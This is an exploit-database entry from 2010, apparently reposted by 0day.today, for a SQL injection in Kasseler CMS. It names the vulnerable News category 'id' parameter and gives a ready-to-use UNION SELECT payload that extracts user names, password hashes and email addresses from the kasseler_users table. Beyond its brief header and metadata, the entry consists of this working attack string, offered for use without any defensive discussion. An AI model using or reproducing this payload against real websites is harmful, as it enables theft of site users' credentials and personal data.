Kasseler CMS [Category] SQL Injection Vulnerabilities

2010-03-23T00:00:00
ID 1337DAY-ID-11415
Type zdt
Reporter Palyo34
Modified 2010-03-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
Kasseler CMS [Category] SQL Injection Vulnerabilities
=====================================================


###########################
 
Author   : Palyo34
 
Homepage : http://www.1923turk.com
 
Script   : www.kasseler-cms.net
 
 
###########################
 
[ Vulnerable File ]
 
index.php?module=News&do=Category&id= [ SQL ]
 
 
[ XpL ]
 
-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--



#  0day.today [2018-04-08]  #